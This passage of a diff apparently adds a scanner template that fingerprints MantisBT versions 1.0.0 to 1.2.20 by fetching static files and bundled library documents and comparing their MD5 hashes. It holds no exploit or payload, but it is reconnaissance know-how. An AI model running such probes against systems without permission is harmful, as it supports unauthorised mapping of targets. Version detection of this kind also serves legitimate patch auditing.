+ - "{{BaseURL}}/javascript/jscalendar/calendar.js" + + matchers: + - type: dsl + name: 1.1.0 - 1.1.9 + dsl: + - "(\"cd7202608bed364dd95bbd2e2c05d917\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/javascript/jscalendar/calendar-blue.css" + + matchers: + - type: dsl + name: 1.1.0 - 1.1.9 + dsl: + - "(\"b8bb29e3c1573d0d2917cd3112b5052d\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/javascript/jscalendar/calendar-setup.js" + + matchers: + - type: dsl + name: 1.1.0 - 1.1.9 + dsl: + - "(\"cf3ac9080722f41e5169cf1454392be5\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/javascript/time_tracking_stopwatch.js" + + matchers: + - type: dsl + name: 1.1.0 - 1.1.9 + dsl: + - "(\"e4e04dce5c5c104c8419d1a1c0384fb4\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/javascript/ajax.js" + + matchers: + - type: dsl + name: 1.1.0 - 1.1.9 + dsl: + - "(\"1f4d693fc80bd57cf57bbc5357ad3c99\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/javascript/common.js" + + matchers: + - type: dsl + name: 1.1.7 - 1.1.9 + dsl: + - "(\"a85fcf54c0907bfc4511c0d199f71421\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.6 + dsl: + - "(\"891397ebcdf907538d2fde890b574376\" == md5(body))" + - type: dsl + name: 1.0.0 - 1.0.8 + dsl: + - "(\"d339af08f67531448de65e711df5c93f\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/javascript/xmlhttprequest.js" + + matchers: + - type: dsl + name: 1.1.0 - 1.1.9 + dsl: + - "(\"38896b1694213ad5a60f78c05e265159\" == md5(body))" + - type: dsl + name: 1.0.0 - 1.0.8 + dsl: + - "(\"adbb9b4e829fe9c0c8416f3c4ba8b5b9\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/javascript/dynamic_filters.js" + + matchers: + - type: dsl + name: 1.1.0 - 1.1.9 + dsl: + - "(\"f1bdab2b1634f6406a540751706585b7\" == md5(body))" + - type: dsl + name: 1.0.7 - 1.0.8 + dsl: + - "(\"842fce4b2f87d0ff5243fab7f09799b2\" == md5(body))" + - type: dsl + name: 1.0.0 - 1.0.6 + dsl: + - "(\"4ef0ef843e2534ef30fc0af9bb118781\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/doc/UPGRADING" + + matchers: + - type: dsl + name: 1.1.1 - 1.1.9 + dsl: + - "(\"b8977dc1178c07b7640034e9da33a207\" == md5(body))" + - type: dsl + name: 1.0.0 - 1.0.5 + dsl: + - "(\"84e0eacd2244eaad4069ffc560dec378\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/api/soap/nusoap/changelog" + + matchers: + - type: dsl + name: 1.1.0 - 1.1.9 + dsl: + - "(\"e6078fa2cf405ed4176b9066fd4c8866\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/core/adodb/xsl/remove-0.3.xsl" + + matchers: + - type: dsl + name: 1.1.0 - 1.1.9 + dsl: + - "(\"678d96591452812ec32cfffc56877b51\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/core/adodb/xsl/convert-0.1-0.3.xsl" + + matchers: + - type: dsl + name: 1.1.0 - 1.1.9 + dsl: + - "(\"6aadb6a50dc09f6e776d5847f70432d0\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/core/adodb/xsl/remove-0.2.xsl" + + matchers: + - type: dsl + name: 1.1.0 - 1.1.9 + dsl: + - "(\"0b2b85762fe8c79ec259c25098840e4d\" == md5(body))" + - type: dsl + name: 1.0.0 - 1.0.8 + dsl: + - "(\"f8d8add7151f0f67ade0c791aea335c0\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/core/adodb/xsl/convert-0.1-0.2.xsl" + + matchers: + - type: dsl + name: 1.1.0 - 1.1.9 + dsl: + - "(\"29d98453a420d4cbaee77cf29e79ccea\" == md5(body))" + - type: dsl + name: 1.0.0 - 1.0.8 + dsl: + - "(\"a27afd139988168b3b90e18e31da5392\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/core/adodb/xsl/convert-0.2-0.1.xsl" + + matchers: + - type: dsl + name: 1.1.0 - 1.1.9 + dsl: + - "(\"5d2788a525f2591249dedab11fa603b4\" == md5(body))" + - type: dsl + name: 1.0.0 - 1.0.8 + dsl: + - "(\"31f9619a3cbc5929267b62c780eb299a\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/core/adodb/xsl/convert-0.2-0.3.xsl" + + matchers: + - type: dsl + name: 1.1.0 - 1.1.9 + dsl: + - "(\"409846921dd94e5bbb473ff65314ea2a\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/core/adodb/cute_icons_for_site/adodb2.gif" + + matchers: + - type: dsl + name: 1.1.0 - 1.1.9 + dsl: + - "(\"f5405fa66aa4da4f6507c9356581b539\" == md5(body))" + - type: dsl + name: 1.0.0 - 1.0.8 + dsl: + - "(\"9b3fdc5a83cc801151db6f2905fbf383\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/core/adodb/cute_icons_for_site/adodb.gif" + + matchers: + - type: dsl + name: 1.1.0 - 1.1.9 + dsl: + - "(\"943052b5ea2b4188ca4453f9b62cebae\" == md5(body))" + - type: dsl + name: 1.0.0 - 1.0.8 + dsl: + - "(\"9f43e16d833127874dc1d63fc2963e02\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/core/adodb/pear/readme.Auth.txt" + + matchers: + - type: dsl + name: 1.1.0 - 1.1.9 + dsl: + - "(\"497018d573a00f8e9c6881907cac4a63\" == md5(body))" + - type: dsl + name: 1.0.0 - 1.0.8 + dsl: + - "(\"b15ce23506dc56301530bd933bf96308\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/core/adodb/session/session_schema2.xml" + + matchers: + - type: dsl + name: 1.1.0 - 1.1.9 + dsl: + - "(\"34094c892ec3ab48bdaead67fd0d09be\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/core/adodb/session/session_schema.xml" + + matchers: + - type: dsl + name: 1.1.0 - 1.1.9 + dsl: + - "(\"644334444418c6b39d20b6f22f3cf634\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/core/adodb/session/adodb-sessions.oracle.sql" + + matchers: + - type: dsl + name: 1.0.0 - 1.1.9 + dsl: + - "(\"08d0fc1f5fbf8b79a4dca43cbd30e3a1\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/core/adodb/session/adodb-sessions.oracle.clob.sql" + + matchers: + - type: dsl + name: 1.0.0 - 1.1.9 + dsl: + - "(\"3c64f822ee1b493b319c6e8196cc06b8\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/core/adodb/session/adodb-sessions.mysql.sql" + + matchers: + - type: dsl + name: 1.0.0 - 1.1.9 + dsl: + - "(\"42fef0886af1f6da31a06de273876b71\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/core/adodb/session/adodb-sess.txt" + + matchers: + - type: dsl + name: 1.1.0 - 1.1.9 + dsl: + - "(\"260bf23fe50279cf27842c0ac8b12ed4\" == md5(body))" + - type: dsl + name: 1.0.0 - 1.0.8 + dsl: + - "(\"a25a7a7ed70830c2d14901e8bf14d4de\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/core/adodb/docs/docs-active-record.htm" + + matchers: + - type: dsl + name: 1.1.0 - 1.1.9 + dsl: + - "(\"4045af219774766581be4608a56c54e9\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/core/adodb/docs/docs-perf.htm" + + matchers: + - type: dsl + name: 1.1.0 - 1.1.9 + dsl: + - "(\"5efa63773a850269f541a84767d0e355\" == md5(body))" + - type: dsl + name: 1.0.0 - 1.0.8 + dsl: + - "(\"26402e0816ffb9f0ca6aba591b7825d3\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/core/adodb/docs/readme.htm" + + matchers: + - type: dsl + name: 1.1.0 - 1.1.9 + dsl: + - "(\"9a0e51379d70a597d2be5cf38ee0dbed\" == md5(body))" + - type: dsl + name: 1.0.0 - 1.0.8 + dsl: + - "(\"deba1b5723be270613c2b4980cf55a69\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/core/adodb/docs/tute.htm" + + matchers: + - type: dsl + name: 1.1.0 - 1.1.9 + dsl: + - "(\"691e557cea6f1f8d7d07329459120954\" == md5(body))" + - type: dsl + name: 1.0.0 - 1.0.8 + dsl: + - "(\"f6f3e9cfb0406893ad4e5832c6307d0c\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/core/adodb/docs/docs-adodb.htm" + + matchers: + - type: dsl + name: 1.1.0 - 1.1.9 + dsl: + - "(\"fdc5ef2bbb259e471483fc8ffee3ab91\" == md5(body))" + - type: dsl + name: 1.0.0 - 1.0.8 + dsl: + - "(\"da44a312bf44d8832cbe53e6092d1ac6\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/core/adodb/docs/docs-session.old.htm" + + matchers: + - type: dsl + name: 1.1.0 - 1.1.9 + dsl: + - "(\"de59e3c34a302c8e7eb2c14ad68e9a1a\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/core/adodb/docs/docs-session.htm" + + matchers: + - type: dsl + name: 1.1.0 - 1.1.9 + dsl: + - "(\"0033c4fdd9c291cbc68151c2efe3689b\" == md5(body))" + - type: dsl + name: 1.0.0 - 1.0.8 + dsl: + - "(\"453530e8910db67e48edfb6f80f03bcf\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/core/adodb/docs/tips_portable_sql.htm" + + matchers: + - type: dsl + name: 1.1.0 - 1.1.9 + dsl: + - "(\"1ad08763e233d4e59ac29db460dad7af\" == md5(body))" + - type: dsl + name: 1.0.0 - 1.0.8 + dsl: + - "(\"743c9b86d9dbd97c51834da5083e72b2\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/core/adodb/docs/docs-datadict.htm" + + matchers: + - type: dsl + name: 1.1.0 - 1.1.9 + dsl: + - "(\"d9b3890f5bf06f5f5b594dbf74e1ad95\" == md5(body))" + - type: dsl + name: 1.0.0 - 1.0.8 + dsl: + - "(\"5365b830c7ac2fb5e23fac9449323c91\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/core/adodb/docs/old-changelog.htm" + + matchers: + - type: dsl + name: 1.1.0 - 1.1.9 + dsl: + - "(\"3158a33f9d5eda38a369b5749198dd02\" == md5(body))" + - type: dsl + name: 1.0.0 - 1.0.8 + dsl: + - "(\"b3952f2585266f48eaaa75cbe84083bb\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/core/adodb/docs/docs-oracle.htm" + + matchers: + - type: dsl + name: 1.1.0 - 1.1.9 + dsl: + - "(\"2c7d7f70eb2c1fbf17154b79e8f72ae0\" == md5(body))" + - type: dsl + name: 1.0.0 - 1.0.8 + dsl: + - "(\"3eb91eddfea6fc4b901d7c6959445f79\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/core/adodb/readme.txt" + + matchers: + - type: dsl + name: 1.1.0 - 1.1.9 + dsl: + - "(\"856de932c83745af0a66cd21d6d1abbf\" == md5(body))" + - type: dsl + name: 1.0.0 - 1.0.8 + dsl: + - "(\"b3809df536fca57760f3fc91370b9e65\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/core/adodb/xmlschema03.dtd" + + matchers: + - type: dsl + name: 1.1.0 - 1.1.9 + dsl: + - "(\"1cd47a61a1edb4da944b23a6fe59bd2a\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/core/adodb/license.txt" + + matchers: + - type: dsl + name: 1.1.0 - 1.1.9 + dsl: + - "(\"8bd77614212dddcfe8ef04c95fbd92e6\" == md5(body))" + - type: dsl + name: 1.0.0 - 1.0.8 + dsl: + - "(\"d859613d59de1a1b9d0846df6a8fa195\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/core/adodb/xmlschema.dtd" + + matchers: + - type: dsl + name: 1.1.0 - 1.1.9 + dsl: + - "(\"26f3f629d55257aafcf66840d7c66618\" == md5(body))" + - type: dsl + name: 1.0.0 - 1.0.8 + dsl: + - "(\"892d5f9859568839158ee76d9a5a8768\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/core/disposable/changelog.txt" + + matchers: + - type: dsl + name: 1.1.0 - 1.1.9 + dsl: + - "(\"368f101e8dd3ea316544c450bb050475\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/core/disposable/readme.txt" + + matchers: + - type: dsl + name: 1.1.0 - 1.1.9 + dsl: + - "(\"120dd032874f0fbc828d92e024cf3dbc\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/core/disposable/license.txt" + + matchers: + - type: dsl + name: 1.1.0 - 1.1.9 + dsl: + - "(\"278f2557e3b277b94e9a8430f6a6d0a9\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/core/phpmailer/ChangeLog.txt" + + matchers: + - type: dsl + name: 1.1.0 - 1.1.9 + dsl: + - "(\"eb64471fb08256563d7d82d8939e4863\" == md5(body))" + - type: dsl + name: 1.0.0 - 1.0.8 + dsl: + - "(\"9138b510f445295a029ee5dd71cc4732\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/core/phpmailer/README" + + matchers: + - type: dsl + name: 1.1.0 - 1.1.9 + dsl: + - "(\"20d2b8e182743c998759bcd9b0306207\" == md5(body))" + - type: dsl + name: 1.0.0 - 1.0.8 + dsl: + - "(\"4aefed554e3533d989b8b2df590422a5\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/core/phpmailer/LICENSE" + + matchers: + - type: dsl + name: 1.1.0 - 1.1.9 + dsl: + - "(\"278f2557e3b277b94e9a8430f6a6d0a9\" == md5(body))" + - type: dsl + name: 1.0.0 - 1.0.8 + dsl: + - "(\"093f6700134dc001638bfd9f6d077d52\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/library/ezc/forum_evolution.svg" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.1 + dsl: + - "(\"aebedc90b271f6f14134b3005a8e3e7b\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/library/phpmailer/changelog.txt" + + matchers: + - type: dsl + name: 1.2.12 - 1.2.15 + dsl: + - "(\"c05b00d198cf3b6794d625efd080d684\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/developers/en/images/erd.png" + + matchers: + - type: dsl + name: 1.2.16 - 1.2.20 + dsl: + - "(\"50d3c819a942757ba637e949fb933511\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/erd/README" + + matchers: + - type: dsl + name: 1.2.16 - 1.2.20 + dsl: + - "(\"41f298d6100359d4facd6c024fda5715\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/administration_guide/en/Makefile" + + matchers: + - type: dsl + name: 1.2.16 - 1.2.20 + dsl: + - "(\"38d8da784577e2bd5050bdca4ab4eea1\" == md5(body))" + - type: dsl + name: 1.2.11 - 1.2.15 + dsl: + - "(\"1ef4671f58e0f5e8e618543af45b2cf4\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/administration_guide/en/authentication.sgml" + + matchers: + - type: dsl + name: 1.2.11 - 1.2.20 + dsl: + - "(\"50141a26d26acfd92e5dd99cd77d8047\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/administration_guide/en/administration_guide.sgml" + + matchers: + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"a14339a6eb6000d12138564a20bd3e81\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"0f1b75dff25585b86aec2f96a448d2d2\" == md5(body))" + - type: dsl + name: 1.2.11 - 1.2.12 + dsl: + - "(\"34ff15d18ba6a63df1ae4e4e00b14ae1\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/administration_guide/en/file-entities.ent" + + matchers: + - type: dsl + name: 1.2.11 - 1.2.20 + dsl: + - "(\"ad89c63c010b28acecdd2b37bc5fd721\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/administration_guide/en/contributing.sgml" + + matchers: + - type: dsl + name: 1.2.11 - 1.2.20 + dsl: + - "(\"7eca1a0d02dd400081050a7f1397255e\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/no_avatar.png" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.8 + dsl: + - "(\"bab5ffd2a8e4e94147ead338f7550364\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.9 + dsl: + - "(\"4626235254b758695108c4a9d9e1015a\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/images/mantis_logo_button.gif" + + matchers: + - type: dsl + name: 1.0.7 - 1.2.8 + dsl: + - "(\"5effa565b42e22b8b46f7dc205f92ffb\" == md5(body))" + - type: dsl + name: 1.0.0 - 1.0.6 + dsl: + - "(\"068896aec621675c1be1607b0dd4e47f\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/langreadme.txt" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.20 + dsl: + - "(\"ec2f21d68c7f46165de03ce7582e89ad\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.9 + dsl: + - "(\"3231d0251d719843fc81f8557994347f\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/packages/mantis.spec" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.20 + dsl: + - "(\"39a60df7e51d93401c13345e81753f4d\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.9 + dsl: + - "(\"e8e328b3f27c064c9a4fe0afb1fca7a4\" == md5(body))" + - type: dsl + name: 1.0.6 - 1.0.8 + dsl: + - "(\"5e660eabbc6ff601ab7eee39038c6c0f\" == md5(body))" + - type: dsl + name: 1.0.0 - 1.0.5 + dsl: + - "(\"a3fca230523b842eed429cbff3e320da\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/packages/mantis-httpd.conf" + + matchers: + - type: dsl + name: 1.1.0 - 1.2.20 + dsl: + - "(\"764fb8143b71bb46ca7199bfa9a8ec77\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/library/projax/index.html" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.20 + dsl: + - "(\"d41d8cd98f00b204e9800998ecf8427e\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/library/projax/readme_mantis.txt" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.20 + dsl: + - "(\"af48433b572542f84cdf78ee02fa5283\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/library/adodb/xsl/remove-0.3.xsl" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.15 + dsl: + - "(\"c793418c11c7eee38fb23dd853959015\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/library/adodb/xsl/convert-0.1-0.3.xsl" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.15 + dsl: + - "(\"fa97c0a510cbd8161e586efeb4b8412f\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/library/adodb/xsl/remove-0.2.xsl" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.15 + dsl: + - "(\"675fd3ff12cb65b88155016a59e0ca8d\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/library/adodb/xsl/convert-0.1-0.2.xsl" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.15 + dsl: + - "(\"63ec818e375adb621902cc083e7cbd10\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/library/adodb/xsl/convert-0.2-0.1.xsl" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.15 + dsl: + - "(\"f5cdb1f409414a3b72e532a42a78f4b4\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/library/adodb/xsl/convert-0.2-0.3.xsl" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.15 + dsl: + - "(\"88a905c5043232fe556bd560bf11469a\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/library/adodb/index.html" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.15 + dsl: + - "(\"d41d8cd98f00b204e9800998ecf8427e\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/library/adodb/session/session_schema2.xml" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.15 + dsl: + - "(\"34094c892ec3ab48bdaead67fd0d09be\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/library/adodb/session/session_schema.xml" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.15 + dsl: + - "(\"644334444418c6b39d20b6f22f3cf634\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/library/adodb/session/adodb-sessions.oracle.sql" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.15 + dsl: + - "(\"08d0fc1f5fbf8b79a4dca43cbd30e3a1\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/library/adodb/session/adodb-sessions.oracle.clob.sql" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.15 + dsl: + - "(\"3c64f822ee1b493b319c6e8196cc06b8\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/library/adodb/session/adodb-sessions.mysql.sql" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.15 + dsl: + - "(\"42fef0886af1f6da31a06de273876b71\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/library/adodb/session/adodb-sess.txt" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.15 + dsl: + - "(\"a25a7a7ed70830c2d14901e8bf14d4de\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/library/adodb/readme.txt" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.15 + dsl: + - "(\"71c3c2e2788d94f85e79cee58c3822a3\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/library/adodb/xmlschema03.dtd" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.15 + dsl: + - "(\"159863e1185c2a4456c83667b07c9b6a\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/library/adodb/license.txt" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.15 + dsl: + - "(\"803565e2ea14ad5e31d297b4fe733c2e\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/library/adodb/readme_mantis.txt" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.15 + dsl: + - "(\"a62482595426e906c9c033099868b3ef\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/library/adodb/xmlschema.dtd" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.15 + dsl: + - "(\"81b52dc1ee9c8403876f65ec6aabd948\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/library/disposable/changelog.txt" + + matchers: + - type: dsl + name: 1.2.9 - 1.2.20 + dsl: + - "(\"80fc00e3de887712c3105246837763ad\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.8 + dsl: + - "(\"37ea1048a83a292babfcec13ee4dca31\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/library/disposable/index.html" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.20 + dsl: + - "(\"d41d8cd98f00b204e9800998ecf8427e\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/library/disposable/readme.txt" + + matchers: + - type: dsl + name: 1.2.9 - 1.2.20 + dsl: + - "(\"120dd032874f0fbc828d92e024cf3dbc\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.8 + dsl: + - "(\"d5cf0e33f4d5b8bbe13b98ad50da2056\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/library/disposable/license.txt" + + matchers: + - type: dsl + name: 1.2.9 - 1.2.20 + dsl: + - "(\"278f2557e3b277b94e9a8430f6a6d0a9\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.8 + dsl: + - "(\"f977bb0142a421d5840bc8ee6e4dd77a\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/library/disposable/readme_mantis.txt" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.20 + dsl: + - "(\"26c06df55b91add33a83dd4be5a51d2f\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/library/phpmailer/ChangeLog.txt" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.11 + dsl: + - "(\"1cb3112bc96f0b4cd8ab0ba4ae1565d4\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/library/phpmailer/README" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.11 + dsl: + - "(\"7f027da7d3d8554b19aeaf468e48f90d\" == md5(body))" + - type: dsl + name: 1.2.12 - 1.2.15 + dsl: + - "(\"5a77656de86a8d65fe03fad7f851534f\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/library/phpmailer/index.html" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.15 + dsl: + - "(\"d41d8cd98f00b204e9800998ecf8427e\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/library/phpmailer/LICENSE" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.15 + dsl: + - "(\"278f2557e3b277b94e9a8430f6a6d0a9\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/library/phpmailer/readme_mantis.txt" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.11 + dsl: + - "(\"df6a490d9e9290c129febdaada8b6c65\" == md5(body))" + - type: dsl + name: 1.2.12 - 1.2.15 + dsl: + - "(\"15a85dde8ab9b2e525ba29e96f21fb0f\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/library/nusoap/0001-Fix-12312-NuSOAP-web-description-XSS-vulnerability.patch" + + matchers: + - type: dsl + name: 1.2.3 - 1.2.20 + dsl: + - "(\"d639190a9af09a00523157562b0ac27b\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/library/nusoap/index.html" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.20 + dsl: + - "(\"d41d8cd98f00b204e9800998ecf8427e\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/library/nusoap/changelog" + + matchers: + - type: dsl + name: 1.2.2 - 1.2.20 + dsl: + - "(\"d75ed67ec93c02e5bce94eee8205b425\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.1 + dsl: + - "(\"b88a16e2fbde2985a608842d9b638eb0\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/library/nusoap/readme_mantis.txt" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.20 + dsl: + - "(\"9b29d9bab3199318458871514e2c44f9\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/javascript/min/addLoadEvent.js" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.20 + dsl: + - "(\"4392c8211101ebffd5ad4ad4d4ffa5c4\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/javascript/min/projax/builder.js" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.20 + dsl: + - "(\"0e00864d2f38e4948900b93269315024\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/javascript/min/projax/prototype.js" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.20 + dsl: + - "(\"d86c96a98574f29e180949cbb3e9a9f3\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/javascript/min/projax/effects.js" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.20 + dsl: + - "(\"bfd0061e7de5bc897084f16a8d095638\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/javascript/min/projax/prototype_b.js" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.20 + dsl: + - "(\"64931f33876162521ada7466973575db\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/javascript/min/projax/scriptaculous.js" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.20 + dsl: + - "(\"bad1b0520d6d2af809f53eb5f1b7c940\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/javascript/min/projax/license.html" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.20 + dsl: + - "(\"833423bd99b3d322db8e86d779eaa21d\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/javascript/min/projax/slider.js" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.20 + dsl: + - "(\"fab1c870d2fa8bbc26bbd9b1d6c1c4bf\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/javascript/min/projax/dragdrop.js" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.20 + dsl: + - "(\"be37f580c38a198c93ccb23d2d0e92ce\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/javascript/min/projax/MIT-LICENSE" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.20 + dsl: + - "(\"644476df73032b063a33b199a3003fd8\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/javascript/min/projax/controls.js" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.20 + dsl: + - "(\"64e2316bd5bd77882335214e26cc474e\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/javascript/min/jscalendar/lang/calendar-en.js" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.20 + dsl: + - "(\"6b2f02f1cb05b5a53aafdd28a32346e9\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/javascript/min/jscalendar/calendar.js" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.20 + dsl: + - "(\"d64850e4f303b6acf96f122e21aea59c\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/javascript/min/jscalendar/calendar-blue.css" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.20 + dsl: + - "(\"4c50139975d4ceb05733c94facd25563\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/javascript/min/jscalendar/calendar-setup.js" + + matchers: + - type: dsl + name: 1.2.0 - 1.2.20 + dsl: + - 